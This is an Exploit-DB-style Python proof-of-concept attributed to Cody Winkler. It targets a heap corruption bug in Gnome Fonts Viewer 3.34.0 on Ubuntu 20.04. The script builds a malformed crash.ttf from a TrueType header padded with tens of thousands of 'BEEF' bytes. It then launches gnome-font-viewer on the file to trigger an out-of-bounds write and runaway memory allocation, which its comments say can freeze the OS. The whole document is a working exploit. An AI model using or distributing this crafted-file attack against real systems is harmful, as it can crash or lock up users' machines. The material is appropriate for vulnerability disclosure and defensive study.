#!/usr/bin/env python3 # Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption # Date: 2020-09-10 # Exploit Author: Cody Winkler # Vendor Homepage: gnome.org # Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html # Version: 3.34.0 # Tested On: Ubuntu 20.04.1 LTS # # Note: May take a few tries. Too many consecutive runs can freeze OS. # This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped. from os import system this_pattern = "BEEF"*21125 # needs to be filled to len ~84500 # TTF file header (probably has some junk data in it) taken from MesloLGS NF Regular.ttf ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54" "\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45" "\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f" "\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55" "\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f" "\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45" "\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61" "\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74" "\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67" "\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73" "\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79" "\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61" "\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65" "\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74" "\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63" "\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78" "\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d" "\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73" "\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65" "\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00" "\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08" "\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14" "\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a") print('[+] Generating crash.ttf with DEADDEAD') with open("./crash.ttf", 'w') as f: f.write(ttf_header) f.write(this_pattern) f.close() print('[+] Done') print('[+] Triggering out-of-bounds write in gnome-font-viewer') system("/usr/bin/gnome-font-viewer ./crash.ttf")